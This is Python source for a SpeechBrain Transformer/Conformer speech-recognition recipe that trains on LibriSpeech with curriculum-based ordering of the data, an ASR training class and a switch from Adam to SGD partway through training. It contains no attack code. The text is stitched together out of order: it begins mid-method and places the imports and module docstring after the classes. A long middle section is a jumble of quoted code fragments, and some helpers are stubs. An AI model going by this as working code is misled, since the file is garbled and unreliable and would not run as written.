        shuffled_data_ids = self._random_shuffle_data_ids(data_ids)
        sorted_data_ids = sorted(shuffled_data_ids, key=cmp_to_key(compare))
        return {data_id: index for index, data_id in enumerate(sorted_data_ids)}

    def _input_length_comparator(self, key1, key2):
        """Compare two data points based on input length."""
        duration1 = float(self.data[key1]["duration"])
        duration2 = float(self.data[key2]["duration"])
        if duration1 > duration2:
            return 1
        elif duration1 < duration2:
            return -1
        else:
            return 0

    def _output_length_comparator(self, key1, key2):
        """Compare two data points based on output length."""
        length1 = len(self.data[key1]["wrd"])
        length2 = len(self.data[key2]["wrd"])
        if length1 > length2:
            return 1
        elif length1 < length2:
            return -1
        else:
            return 0

    def _alphabetic_comparator(self, key1, key2):
        """Compare two data points based on alphabetic order."""
        text1 = self.data[key1]["wrd"]
        text2 = self.data[key2]["wrd"]
        if text1 > text2:
            return 1
        elif text1 < text2:
            return -1
        else:
            return 0
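# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original recipe): batch-level
# reordering above proceeds in three steps: lay the ids out by their current
# weights, cut the sequence into batch_size chunks, permute the chunks, and
# re-assign consecutive weights. Below is a minimal stand-alone version of
# that pipeline on hypothetical weights; the recipe never calls it.
def _demo_batchwise_reorder(weights, batch_size=2):
    """Return new weights after reversing the order of whole batches, e.g.
    {"a": 0, "b": 1, "c": 2, "d": 3, "e": 4} with batch_size=2 yields the
    order e, c, d, a, b."""
    ordered = [None] * len(weights)
    for data_id, weight in weights.items():
        ordered[weight] = data_id  # place each id at its weight position
    batch_count = math.ceil(len(ordered) / batch_size)
    batches = [
        ordered[b * batch_size : (b + 1) * batch_size] for b in range(batch_count)
    ]
    batches = batches[::-1]  # list equivalent of np.flipud on batch indices
    reordered = [data_id for batch in batches for data_id in batch]
    return {data_id: index for index, data_id in enumerate(reordered)}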
class ASR(sb.core.Brain):
    r"""Brain class abstracts away the details of data loops.

    The primary purpose of the `Brain` class is the implementation of the
    ``fit()`` method, which iterates epochs and datasets for the purpose of
    "fitting" a set of modules to a set of data. In order to use the
    ``fit()`` method, one should sub-class the ``Brain`` class and override
    any methods for which the default behavior does not match the use case.
    For a simple use case (e.g., training a single model with a single
    dataset), the only methods that need to be overridden are:

    * ``compute_forward()``
    * ``compute_objectives()``

    For more complicated use cases, such as multiple modules that need to be
    updated, the following methods can also be overridden:

    * ``fit_batch()``
    * ``evaluate_batch()``

    Arguments
    ---------
    modules : dict of str:torch.nn.Module pairs
        These modules are passed to the optimizer by default if they have
        trainable parameters, and will have ``train()``/``eval()`` called on
        them.
    opt_class : torch.optim class
        A torch optimizer constructor that takes only the list of parameters
        (e.g., a lambda or partial function definition). By default, this will
        be passed all modules in ``modules`` at the beginning of the ``fit()``
        method. This behavior can be changed by overriding the
        ``configure_optimizers()`` method.
    hparams : dict
        Each key:value pair should consist of a string key and a
        hyperparameter that is used within the overridden methods. These will
        be accessible via an ``hparams`` attribute, using "dot" notation:
        e.g., self.hparams.model(x).
    run_opts : dict
        A set of options to change the runtime environment, including:

        debug (bool)
            If ``True``, this will only iterate a few batches for all
            datasets, to ensure code runs without crashing.
        debug_batches (int)
            Number of batches to run in debug mode, default ``2``.
        debug_epochs (int)
            Number of epochs to run in debug mode, default ``2``. If a
            non-positive number is passed, all epochs are run.
        jit_module_keys (list of str)
            List of keys in ``modules`` that should be jit compiled.
        distributed_count (int)
            Number of devices to run on.
        distributed_backend (str)
            One of ``ddp_nccl``, ``ddp_gloo``, ``ddp_mpi``, ``data_parallel``.
        device (str)
            The location for performing computations.
        auto_mix_prec (bool)
            If ``True``, automatic mixed-precision is used. Activate it only
            with cuda.
        max_grad_norm (float)
            Default implementation of ``fit_batch()`` uses ``clip_grad_norm_``
            with this value, default ``5``.
        nonfinite_patience (int)
            Number of times to ignore non-finite losses before stopping,
            default ``3``.
        noprogressbar (bool)
            Whether to turn off the progressbar when training, default
            ``False``.
        ckpt_interval_minutes (float)
            Amount of time between saving intra-epoch checkpoints, in minutes,
            default ``15.0``. If non-positive, intra-epoch checkpoints are not
            saved.
    checkpointer : speechbrain.Checkpointer
        Used to load checkpoints; the optimizer is added to it so training
        can be resumed if interrupted.
    inter_epoch_dataset_updation : bool
        Whether the dataset must be updated between epochs. It is used in
        curriculum-learning variants that take feedback from the model and
        reshuffle the dataset. By default, it is ``False``.
    sortagrad : int
        Number of epochs for which the curriculum-based dataset is used. It
        can take one of the following values:

        * ``-1`` - use curriculum learning for all epochs
        * ``n`` - use curriculum learning for ``n`` epochs

        By default, it is ``-1``.
    """

    def __init__(
        self,
        modules=None,
        opt_class=None,
        hparams=None,
        run_opts=None,
        checkpointer=None,
        inter_epoch_dataset_updation=False,
        sortagrad=-1,
    ):
        super().__init__(
            modules=modules,
            opt_class=opt_class,
            hparams=hparams,
            run_opts=run_opts,
            checkpointer=checkpointer,
        )
        # Save attributes related to curriculum learning
        self.inter_epoch_dataset_updation = inter_epoch_dataset_updation
        self.sortagrad = sortagrad
        # Create tensorboard summary writer
        self.tensorboard_writer = SummaryWriter(
            self.hparams.output_folder + "/tensorboard"
        )

    def compute_forward(self, batch, stage):
        """Forward computations from the waveform batches to the output
        probabilities."""
        batch = batch.to(self.device)
        wavs, wav_lens = batch.sig
        tokens_bos, _ = batch.tokens_bos

        # Add augmentation if specified
        if stage == sb.Stage.TRAIN:
            if hasattr(self.modules, "env_corrupt"):
                wavs_noise = self.modules.env_corrupt(wavs, wav_lens)
                wavs = torch.cat([wavs, wavs_noise], dim=0)
                wav_lens = torch.cat([wav_lens, wav_lens])
                tokens_bos = torch.cat([tokens_bos, tokens_bos], dim=0)

        # Compute features
        feats = self.hparams.compute_features(wavs)
        current_epoch = self.hparams.epoch_counter.current
        feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch)
        if stage == sb.Stage.TRAIN:
            if hasattr(self.hparams, "augmentation"):
                feats = self.hparams.augmentation(feats)

        # Forward modules
        src = self.modules.CNN(feats)
        enc_out, pred = self.modules.Transformer(
            src, tokens_bos, wav_lens, pad_idx=self.hparams.pad_index
        )

        # Output layer for ctc log-probabilities
        logits = self.modules.ctc_lin(enc_out)
        p_ctc = self.hparams.log_softmax(logits)

        # Output layer for seq2seq log-probabilities
        pred = self.modules.seq_lin(pred)
        p_seq = self.hparams.log_softmax(pred)

        # Compute outputs
        hyps = None
        if stage == sb.Stage.VALID:
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch % self.hparams.valid_search_interval == 0:
                # For the sake of efficiency, we only perform beamsearch with
                # limited capacity and no LM to give the user some idea of how
                # the AM is doing
                hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens)
        elif stage == sb.Stage.TEST:
            hyps, _ = self.hparams.test_search(enc_out.detach(), wav_lens)
        return p_ctc, p_seq, wav_lens, hyps

    def compute_objectives(self, predictions, batch, stage):
        """Computes the loss (CTC+NLL) given predictions and targets."""
        (p_ctc, p_seq, wav_lens, hyps,) = predictions
        ids = batch.id
        tokens_eos, tokens_eos_lens = batch.tokens_eos
        tokens, tokens_lens = batch.tokens

        if hasattr(self.modules, "env_corrupt") and stage == sb.Stage.TRAIN:
            tokens_eos = torch.cat([tokens_eos, tokens_eos], dim=0)
            tokens_eos_lens = torch.cat(
                [tokens_eos_lens, tokens_eos_lens], dim=0
            )
            tokens = torch.cat([tokens, tokens], dim=0)
            tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0)

        loss_seq = self.hparams.seq_cost(
            p_seq, tokens_eos, length=tokens_eos_lens
        )
        loss_ctc = self.hparams.ctc_cost(p_ctc, tokens, wav_lens, tokens_lens)
        loss = (
            self.hparams.ctc_weight * loss_ctc
            + (1 - self.hparams.ctc_weight) * loss_seq
        )

        if stage != sb.Stage.TRAIN:
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if (
                current_epoch % valid_search_interval == 0
                or stage == sb.Stage.TEST
            ):
                # Decode token terms to words
                predicted_words = [
                    self.tokenizer.decode_ids(utt_seq).split(" ")
                    for utt_seq in hyps
                ]
                target_words = [wrd.split(" ") for wrd in batch.wrd]
                self.wer_metric.append(ids, predicted_words, target_words)
            # Compute the accuracy of the one-step-forward prediction
            self.acc_metric.append(p_seq, tokens_eos, tokens_eos_lens)
        return loss, loss_ctc, loss_seq

    def fit_batch(self, batch):
        """Train the parameters given a single batch in input."""
        # Check if we need to switch optimizer; if so, change the optimizer
        # from Adam to SGD
        self.check_and_reset_optimizer()

        predictions = self.compute_forward(batch, sb.Stage.TRAIN)
        loss, loss_ctc, loss_seq = self.compute_objectives(
            predictions, batch, sb.Stage.TRAIN
        )

        # Normalize the loss by the gradient accumulation steps
        (loss / self.hparams.gradient_accumulation).backward()

        if self.step % self.hparams.gradient_accumulation == 0:
            # Gradient clipping & early stop if loss is not finite
            self.check_gradients(loss)
            self.optimizer.step()
            self.optimizer.zero_grad()
            # Anneal lr every update
            self.hparams.noam_annealing(self.optimizer)

        return loss.detach(), loss_ctc.detach(), loss_seq.detach()

    def evaluate_batch(self, batch, stage):
        """Computations needed for validation/test batches."""
        with torch.no_grad():
            predictions = self.compute_forward(batch, stage=stage)
            loss, _, _ = self.compute_objectives(predictions, batch, stage=stage)
        return loss.detach()

    def on_stage_start(self, stage, epoch):
        """Gets called at the beginning of each epoch."""
        if stage != sb.Stage.TRAIN:
            self.acc_metric = self.hparams.acc_computer()
            self.wer_metric = self.hparams.error_rate_computer()

    def on_stage_end(self, stage, stage_loss, epoch):
        """Gets called at the end of an epoch."""
        # Compute/store important stats
        stage_stats = {"loss": stage_loss}
        if stage == sb.Stage.TRAIN:
            self.train_stats = stage_stats
            self.recreate_train_dataset(epoch=self.hparams.epoch_counter.current)
        else:
            stage_stats["ACC"] = self.acc_metric.summarize()
            current_epoch = self.hparams.epoch_counter.current
            valid_search_interval = self.hparams.valid_search_interval
            if (
                current_epoch % valid_search_interval == 0
                or stage == sb.Stage.TEST
            ):
                stage_stats["WER"] = self.wer_metric.summarize("error_rate")

        # Log stats and save checkpoint at end-of-epoch
        if stage == sb.Stage.VALID and sb.utils.distributed.if_main_process():
            # Report different epoch stages according to the current stage
            current_epoch = self.hparams.epoch_counter.current
            if current_epoch <= self.hparams.stage_one_epochs:
                lr = self.hparams.noam_annealing.current_lr
                steps = self.hparams.noam_annealing.n_steps
            else:
                lr = self.hparams.lr_sgd
                steps = -1
            optimizer = self.optimizer.__class__.__name__
            epoch_stats = {
                "epoch": epoch,
                "lr": lr,
                "steps": steps,
                "optimizer": optimizer,
            }
            self.hparams.train_logger.log_stats(
                stats_meta=epoch_stats,
                train_stats=self.train_stats,
                valid_stats=stage_stats,
            )
            self.checkpointer.save_and_keep_only(
                meta={"ACC": stage_stats["ACC"], "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=5,
            )
        elif stage == sb.Stage.TEST:
            self.hparams.train_logger.log_stats(
                stats_meta={"Epoch loaded": self.hparams.epoch_counter.current},
                test_stats=stage_stats,
            )
            with open(self.hparams.wer_file, "w") as w:
                self.wer_metric.write_stats(w)
            # Save the averaged checkpoint at the end of the evaluation stage
            # and delete the rest of the intermediate checkpoints. ACC is set
            # to 1.1 so the checkpointer only keeps the averaged checkpoint.
            self.checkpointer.save_and_keep_only(
                meta={"ACC": 1.1, "epoch": epoch},
                max_keys=["ACC"],
                num_to_keep=1,
            )

    def recreate_train_dataset(self, epoch):
        """Gets called at the end of an epoch. This is used to decide whether
        the training dataset must be recreated for the next epoch. (The
        branches below are stubs, as in the original; actual dataset
        recreation hooks in at these points.)"""
        if not self.inter_epoch_dataset_updation:
            # Keep the dataset created with the preferred CL approach
            return
        else:
            if self.sortagrad != -1:
                # Curriculum ordering is only kept for `sortagrad` epochs;
                # afterwards continue using random shuffling
                return
            else:
                # Recreate the dataset using the preferred CL approach
                return

    def check_and_reset_optimizer(self):
        """Reset the optimizer if training enters stage two."""
        current_epoch = self.hparams.epoch_counter.current
        if not hasattr(self, "switched"):
            self.switched = False
            if isinstance(self.optimizer, torch.optim.SGD):
                self.switched = True
        if self.switched is True:
            return
        if current_epoch > self.hparams.stage_one_epochs:
            self.optimizer = self.hparams.SGD(self.modules.parameters())
            if self.checkpointer is not None:
                self.checkpointer.add_recoverable("optimizer", self.optimizer)
            self.switched = True

    def on_fit_start(self):
        """Initialize the right optimizer at the training start."""
        super().on_fit_start()
        # If the model is resumed from stage two, reinitialize the optimizer
        current_epoch = self.hparams.epoch_counter.current
        current_optimizer = self.optimizer
        if current_epoch > self.hparams.stage_one_epochs:
            del self.optimizer
            self.optimizer = self.hparams.SGD(self.modules.parameters())
            # Load the latest checkpoint to resume training if interrupted
            if self.checkpointer is not None:
                # Do not reload the weights if training is interrupted right
                # before stage two
                group = current_optimizer.param_groups[0]
                if "momentum" not in group:
                    return
                self.checkpointer.recover_if_possible(
                    device=torch.device(self.device)
                )

    def on_evaluate_start(self, max_key=None, min_key=None):
        """Perform checkpoint averaging if needed."""
        super().on_evaluate_start()
        ckpts = self.checkpointer.find_checkpoints(
            max_key=max_key, min_key=min_key
        )
        ckpt = sb.utils.checkpoints.average_checkpoints(
            ckpts, recoverable_name="model", device=self.device
        )
        self.hparams.model.load_state_dict(ckpt, strict=True)
        self.hparams.model.eval()

    def fit(
        self,
        epoch_counter,
        train_set,
        valid_set=None,
        progressbar=None,
        train_loader_kwargs={},
        valid_loader_kwargs={},
    ):
        """Iterate epochs and datasets to improve the objective.

        Relies on the existence of multiple functions that can (or should) be
        overridden. The following methods are used and expected to have a
        certain behavior:

        * ``fit_batch()``
        * ``evaluate_batch()``
        * ``update_average()``

        If the initialization was done with distributed_count > 0 and the
        distributed_backend is ddp, this will generally handle multiprocess
        logic, like splitting the training data into subsets for each device
        and only saving a checkpoint on the main process.

        Arguments
        ---------
        epoch_counter : iterable
            Each call should return an integer indicating the epoch count.
        train_set : Dataset, DataLoader
            A set of data to use for training. If a Dataset is given, a
            DataLoader is automatically created. If a DataLoader is given, it
            is used directly.
        valid_set : Dataset, DataLoader
            A set of data to use for validation. If a Dataset is given, a
            DataLoader is automatically created. If a DataLoader is given, it
            is used directly.
        train_loader_kwargs : dict
            Kwargs passed to `make_dataloader()` for making the train_loader
            (if train_set is a Dataset, not a DataLoader), e.g., batch_size,
            num_workers. DataLoader kwargs are all valid.
        valid_loader_kwargs : dict
            Kwargs passed to `make_dataloader()` for making the valid_loader
            (if valid_set is a Dataset, not a DataLoader), e.g., batch_size,
            num_workers. DataLoader kwargs are all valid.
        progressbar : bool
            Whether to display the progress of each epoch in a progressbar.
        """
        if not (
            isinstance(train_set, DataLoader)
            or isinstance(train_set, LoopedLoader)
        ):
            train_set = self.make_dataloader(
                train_set, stage=sb.Stage.TRAIN, **train_loader_kwargs
            )
        if valid_set is not None and not (
            isinstance(valid_set, DataLoader)
            or isinstance(valid_set, LoopedLoader)
        ):
            valid_set = self.make_dataloader(
                valid_set,
                stage=sb.Stage.VALID,
                ckpt_prefix=None,
                **valid_loader_kwargs,
            )

        self.on_fit_start()
        self.train_set = train_set
        total_steps = len(train_set)
        if progressbar is None:
            progressbar = not self.noprogressbar

        # Iterate epochs
        for epoch in epoch_counter:
            # Training stage
            self.on_stage_start(Stage.TRAIN, epoch)
            self.modules.train()

            # Reset nonfinite count to 0 each epoch
            self.nonfinite_count = 0
            if self.train_sampler is not None and hasattr(
                self.train_sampler, "set_epoch"
            ):
                self.train_sampler.set_epoch(epoch)

            # Time since last intra-epoch checkpoint
            last_ckpt_time = time.time()

            # Only show progressbar if requested and on the main process
            enable = progressbar and sb.utils.distributed.if_main_process()
            completed_steps = (epoch - 1) * total_steps
            with tqdm(
                self.train_set,
                initial=self.step,
                dynamic_ncols=True,
                disable=not enable,
            ) as t:
                for batch in t:
                    self.step += 1
                    global_step = completed_steps + self.step
                    loss, loss_ctc, loss_seq = self.fit_batch(batch)
                    self.avg_train_loss = self.update_average(
                        loss, self.avg_train_loss
                    )
                    t.set_postfix(train_loss=self.avg_train_loss)

                    # Write training summary to tensorboard
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/tot_loss", loss, global_step
                    )
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/ctc_loss", loss_ctc, global_step
                    )
                    self.tensorboard_writer.add_scalar(
                        "Train/Loss/att_loss", loss_seq, global_step
                    )

                    # Debug mode only runs a few batches
                    if self.debug and self.step == self.debug_batches:
                        break

                    if (
                        self.checkpointer is not None
                        and self.ckpt_interval_minutes > 0
                        and time.time() - last_ckpt_time
                        >= self.ckpt_interval_minutes * 60.0
                    ):
                        run_on_main(self._save_intra_epoch_ckpt)
                        last_ckpt_time = time.time()

            # Run train "on_stage_end" on all processes
            self.on_stage_end(Stage.TRAIN, self.avg_train_loss, epoch)
            self.avg_train_loss = 0.0
            self.step = 0

            # Validation stage
            if valid_set is not None:
                self.on_stage_start(Stage.VALID, epoch)
                self.modules.eval()
                avg_valid_loss = 0.0
                with torch.no_grad():
                    for batch in tqdm(
                        valid_set, dynamic_ncols=True, disable=not enable
                    ):
                        self.step += 1
                        loss = self.evaluate_batch(batch, stage=Stage.VALID)
                        avg_valid_loss = self.update_average(
                            loss, avg_valid_loss
                        )
                        # Debug mode only runs a few batches
                        if self.debug and self.step == self.debug_batches:
                            break
                    # Only run validation "on_stage_end" on the main process
                    self.step = 0
                    run_on_main(
                        self.on_stage_end,
                        args=[Stage.VALID, avg_valid_loss, epoch],
                    )

            # Debug mode only runs a few epochs
            if self.debug and epoch == self.debug_epochs:
                break
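# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original recipe): the Brain subclass
# above trains stage one with Adam under a Noam schedule and switches to SGD
# once the epoch counter passes `stage_one_epochs`. The same switching logic,
# stripped of SpeechBrain machinery and applied to a toy model (all names and
# values here are hypothetical), looks like this; the recipe never calls it.
def _demo_two_stage_optimizer(stage_one_epochs=2, total_epochs=4):
    model = torch.nn.Linear(4, 2)
    optimizer = torch.optim.Adam(model.parameters(), lr=1e-3)
    for epoch in range(1, total_epochs + 1):
        if epoch > stage_one_epochs and not isinstance(
            optimizer, torch.optim.SGD
        ):
            # Stage two: recreate the optimizer over the same parameters
            optimizer = torch.optim.SGD(
                model.parameters(), lr=1e-4, momentum=0.9
            )
        loss = model(torch.randn(8, 4)).pow(2).mean()
        loss.backward()
        optimizer.step()
        optimizer.zero_grad()
    return optimizer.__class__.__name__  # "SGD" once stage two was reached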
Training is performed on", "approach return else: if self.sortagrad != -1: # number of epochs for which", "range (`min_value`, `max_value`)\"\"\" if min_value == None and max_value == None: return weights", ") as t: # cnt = 0 # for batch in t: #", "if ordering_type == \"random\": weights = self._random_shuffled_weights(filtered_data_ids) elif ordering_type == \"sorted\": if weights", "1.1, \"epoch\": epoch}, max_keys=[\"ACC\"], num_to_keep=1, ) def recreate_train_dataset(self,epoch): \"\"\"Gets called at the end", "= batch.id tokens_eos, tokens_eos_lens = batch.tokens_eos tokens, tokens_lens = batch.tokens if hasattr(self.modules, \"env_corrupt\")", "for i, data_id in enumerate(weights.keys()): if select_n is not None and len(filtered_ids) ==", "By default, this will be passed all modules in ``modules`` at the beginning", "do not reload the weights if training is interrupted right before stage 2", "use case (e.g., training a single model with a single dataset) the only", "``data_parallel``. device (str) The location for performing computations. auto_mix_prec (bool) If ``True``, automatic", "losses before stopping. Default: ``3``. noprogressbar (bool) Whether to turn off progressbar when", "items may be expensive, and this way the filtering and sorting steps don't", "run_on_main(hparams[\"pretrainer\"].collect_files) hparams[\"pretrainer\"].load_collected(device=run_opts[\"device\"]) # Trainer initialization asr_brain = ASR( modules=hparams[\"modules\"], opt_class=hparams[\"Adam\"], hparams=hparams, run_opts=run_opts, checkpointer=hparams[\"checkpointer\"],", "average of the checkpoints from last 5 epochs. The experiment file is flexible", "1 elif text1 < text2: return -1 else: return 0 class ASR(sb.core.Brain): r\"\"\"Brain", ": bool Whether dataset must be updated every between epochs or not. It", "idea of how the AM is doing hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens) elif", "elif batch_selection == \"random\": weights = self._random_shuffled_batches(weights, batch_size) elif batch_selection == \"sorted\": pass", "sorted using custom weights\"\"\" def weights_filter(weights,min_value,max_value): \"\"\"Checks if the data example has weight", "enumerate(weights.keys()): if select_n is not None and len(filtered_ids) == select_n: break filtered_ids.append((weights[data_id],i,data_id)) filtered_sorted_ids", "self.on_stage_end, args=[Stage.VALID, avg_valid_loss, epoch], ) # Debug mode only runs a few epochs", "static data, but has its own output keys and dynamic items (initially deep", "\"merge_lst\": hparams[\"train_splits\"], \"merge_name\": hparams[\"train_csv\"], \"skip_prep\": hparams[\"skip_prep\"], }, ) # here we create the", "0 or ( stage == sb.Stage.TEST ): # Decode token terms to words", "is True: return if current_epoch > self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer is", "in the YAML file). The tokenizer is loaded at the same time. run_on_main(hparams[\"pretrainer\"].collect_files)", "first n data points found. Meant for debugging. Returns ------- FilteredSortedDynamicItemDataset Shares the", "\"sorting must be random, ascending or descending\" # ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"],", "weights, min_value=None, max_value=None, select_n=None, reverse=False ): \"\"\"Returns a list of data ids, filtered", "len(data_ids) , \"OOPS!! 
Batchwise sorting gone wrong.\" weights = {} for index,data_id in", "min_weight : None, int If not None, will only keep data_point if weight[data_point]", "self, data_ids, key_min_value={}, key_max_value={}, key_test={} ): \"\"\"Returns a list of data ids, fulfilling", "# for batch in t: # # print(batch.duration) # # print(batch.wrd) # #", "self.hparams.valid_search_interval if ( current_epoch % valid_search_interval == 0 or stage == sb.Stage.TEST ):", "[] for batch in np.flipud(np.arange(batch_count)): start_index = batch_size * batch end_index = min((batch_size+1)*batch,", "current_epoch = self.hparams.epoch_counter.current feats = self.modules.normalize(feats, wav_lens, epoch=current_epoch) if stage == sb.Stage.TRAIN: if", "weight[data_point] > min_weight max_weight : None, int If not None, will only keep", "if current_epoch > self.hparams.stage_one_epochs: self.optimizer = self.hparams.SGD(self.modules.parameters()) if self.checkpointer is not None: self.checkpointer.add_recoverable(\"optimizer\",", "of three values * ``-1`` - Use curriculum learning for all epochs *", "else: return def check_and_reset_optimizer(self): \"\"\"reset the optimizer if training enters stage 2\"\"\" current_epoch", "column,order = order.split(\":\") ordering_info.append({\"key\":column,\"order\":order}) return ordering_info def _random_shuffle_data_ids( self, data_ids ): \"\"\"Shuffle the", "compute_objectives(self, predictions, batch, stage): \"\"\"Computes the loss (CTC+NLL) given predictions and targets.\"\"\" (p_ctc,", "for debugging. Returns ------- FilteredSortedDynamicItemDataset Shares the static data, but has its own", "tokens], dim=0) tokens_lens = torch.cat([tokens_lens, tokens_lens], dim=0) loss_seq = self.hparams.seq_cost( p_seq, tokens_eos, length=tokens_eos_lens", "_random_shuffled_weights( self, data_ids ): \"\"\"Create random weightages for data_ids\"\"\" shuffled_ids = self._random_shuffle_data_ids(data_ids) weights", "the parameter files, you can try different encoders, decoders, tokens (e.g, characters instead", "some idea of how the AM is doing hyps, _ = self.hparams.valid_search(enc_out.detach(), wav_lens)", "download the pretrained LM from HuggingFace (or elsewhere depending on # # the", "training and get better results. # train_data = train_data.filtered_sorted(sort_key=\"duration\") # # when sorting", "return weights def _input_length_comparator( self, key1, key2 ): \"\"\"Compare two data points based", "= progressbar and sb.utils.distributed.if_main_process() completed_steps = (epoch - 1) * total_steps with tqdm(", "max_key=None, min_key=None): \"\"\"perform checkpoint averge if needed\"\"\" super().on_evaluate_start() ckpts = self.checkpointer.find_checkpoints( max_key=max_key, min_key=min_key", "change the runtime environment, including debug (bool) If ``True``, this will only iterate", "computing some dynamic items may be expensive, and this way the filtering and", "min_weight, max_weight, select_n ) return FilteredSortedDynamicItemDataset( self, filtered_sorted_ids ) def _filter_dataset( self, data_ids,", "# ) valid_data = sb.dataio.dataset.DynamicItemDataset.from_csv( csv_path=hparams[\"valid_csv\"], replacements={\"data_root\": data_folder}, ) valid_data = valid_data.filtered_sorted(sort_key=\"duration\") #", "# train_data = train_data.filtered_sorted( # sort_key=\"duration\", reverse=True # ) # # when sorting", "--------- key_min_value : dict Map from key (in data or in dynamic items)", "A set of data to use for training. 
"""Recipe for training a Transformer ASR system with librispeech, with
curriculum learning over the ordering of the training data.

To run this recipe, do the following:
> python train.py hparams/transformer.yaml
> python train.py hparams/conformer.yaml

With the default hyperparameters, the system employs a convolutional
frontend and a transformer encoder. The decoder is based on a transformer
decoder. Beamsearch coupled with a Transformer language model is used on
the top of decoder probabilities.

The neural network is trained on both CTC and negative-log likelihood
targets and sub-word units estimated with Byte Pairwise Encoding (BPE) are
used as basic recognition tokens. Training is performed on the full
LibriSpeech dataset (960 h).

Authors
 * <NAME> 2020
 * <NAME> 2021
"""

import logging
import math
import os
import sys
import time
from functools import cmp_to_key
from pathlib import Path

import numpy as np
import torch
from hyperpyyaml import load_hyperpyyaml
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm

import speechbrain as sb
from speechbrain.core import Stage
from speechbrain.dataio.dataloader import LoopedLoader
from speechbrain.dataio.dataset import FilteredSortedDynamicItemDataset
from speechbrain.utils.distributed import run_on_main

logger = logging.getLogger(__name__)


def make_dataloader(dataset, stage, ckpt_prefix="dataloader-", **loader_kwargs):
    """Standalone dataloader helper mirroring ``Brain.make_dataloader``."""
    ...


class CurriculumDataset(sb.dataio.dataset.DynamicItemDataset):
    """DynamicItemDataset with curriculum-learning filtering and ordering."""

    def filtered_sorted(
        self,
        key_min_value={},
        key_max_value={},
        key_test={},
        min_weight=None,
        max_weight=None,
        weights=None,
        ordering_info="",
        batch_selection="contiguous",
        batch_size=8,
        select_n=None,
    ):
        """Get a filtered and/or sorted version of this dataset, ordered
        based on the specified curriculum; shares static data.

        The reason to implement filtering and sorting in the same method is
        that computing some dynamic items may be expensive, and this way the
        filtering and sorting can share a single pass over the data.

        Arguments
        ---------
        key_min_value : dict
            Map from key (in data or in dynamic items) to limit, will only
            keep data_point if data_point[key] >= limit.
        key_max_value : dict
            Map from key (in data or in dynamic items) to limit, will only
            keep data_point if data_point[key] <= limit.
        key_test : dict
            Map from key (in data or in dynamic items) to func, will only
            keep data_point if bool(func(data_point[key])) == True.
        min_weight : None, int
            If not None, will only keep data_point if
            weight[data_point] > min_weight.
        max_weight : None, int
            If not None, will only keep data_point if
            weight[data_point] < max_weight.
        weights : dict
            Map from data_id to weight; these weights will be used to sort
            the dataset. If None, weights are created from `ordering_info`.
        ordering_info : str
            Curriculum specification, e.g. "duration:asc".
        batch_selection : str
            After the dataset is ordered based on `ordering_info`, divide
            the dataset into batches and then:
            * "sorted" - keep the sorted batch order.
            * "random" - shuffle the order of the batches.
            * "reverse-sorted" - reverse the order of the batches.
        batch_size : int
            Batch size used for the batch-level selection above.
        select_n : None, int
            If not None, only keep (at most) the first n filtered data points.

        Returns
        -------
        FilteredSortedDynamicItemDataset
            Shares the static data, but has its own output keys and dynamic
            items.
        """
        dataset_ordering = self._parse_ordering_info(ordering_info)
        if batch_selection == "contiguous":
            batch_selection = (
                "sorted" if len(dataset_ordering) > 0 else "random"
            )
        filtered_data_ids = self._filter_dataset(
            self.data_ids, key_min_value, key_max_value, key_test
        )
        if weights == None:
            # Create dataset using ordering info
            weights = self._custom_sorted_weights(
                filtered_data_ids, dataset_ordering
            )
        else:
            weights = {did: weights[did] for did in filtered_data_ids}

        if batch_selection == "random":
            weights = self._random_shuffled_batches(weights, batch_size)
        elif batch_selection == "sorted":
            pass
        elif batch_selection == "reverse-sorted":
            weights = self._reverse_sort_batches(weights, batch_size)
        else:
            raise NotImplementedError(
                "Ordering Type must be one of "
                "`sorted`, `random` or `reverse-sorted`."
            )

        filtered_sorted_ids = self._weighted_filtered_sorted_ids(
            weights, min_weight, max_weight, select_n
        )
        return FilteredSortedDynamicItemDataset(
            self, filtered_sorted_ids
        )

    def _filter_dataset(
        self, data_ids, key_min_value={}, key_max_value={}, key_test={}
    ):
        """Filter data ids with the given limits and tests."""

        def combined_filter(computed, key_min_value, key_max_value, key_test):
            for key, limit in key_min_value.items():
                if computed[key] >= limit:
                    continue
                return False
            for key, limit in key_max_value.items():
                if computed[key] <= limit:
                    continue
                return False
            for key, func in key_test.items():
                if bool(func(computed[key])):
                    continue
                return False
            return True

        temp_keys = (
            set(key_min_value.keys())
            | set(key_max_value.keys())
            | set(key_test.keys())
        )
        filtered_data_ids = []
        with self.output_keys_as(temp_keys):
            for i, data_id in enumerate(data_ids):
                data_point = self.data[data_id]
                data_point["id"] = data_id
                computed = self.pipeline.compute_outputs(data_point)
                if combined_filter(
                    computed, key_min_value, key_max_value, key_test
                ):
                    filtered_data_ids.append(data_id)
        return filtered_data_ids

    def _weighted_filtered_sorted_ids(
        self, weights, min_value=None, max_value=None, select_n=None,
        reverse=False,
    ):
        """Returns a list of data ids, filtered and sorted using custom
        weights."""

        def weights_filter(weights, min_value, max_value):
            """Checks if the data examples have weights inside the range."""
            if min_value == None and max_value == None:
                return weights
            if isinstance(min_value, int):
                min_value = float(min_value)
            if isinstance(max_value, int):
                max_value = float(max_value)
            min_value = -np.inf if min_value is None else min_value
            max_value = np.inf if max_value is None else max_value
            return {
                data_id: weight
                for data_id, weight in weights.items()
                if min_value < weight < max_value
            }

        weights = weights_filter(weights, min_value, max_value)
        filtered_ids = []
        for i, data_id in enumerate(weights.keys()):
            if select_n is not None and len(filtered_ids) == select_n:
                break
            filtered_ids.append((weights[data_id], i, data_id))
        return [tup[2] for tup in sorted(filtered_ids, reverse=reverse)]

    def _custom_sorted_weights(self, data_ids, ordering_info):
        """Create sorting weights for data points using `ordering_info`."""

        def compare(key1, key2):
            """Comparing logic, as `ordering_info` can chain several keys."""
            res = 0
            for ordering in ordering_info:
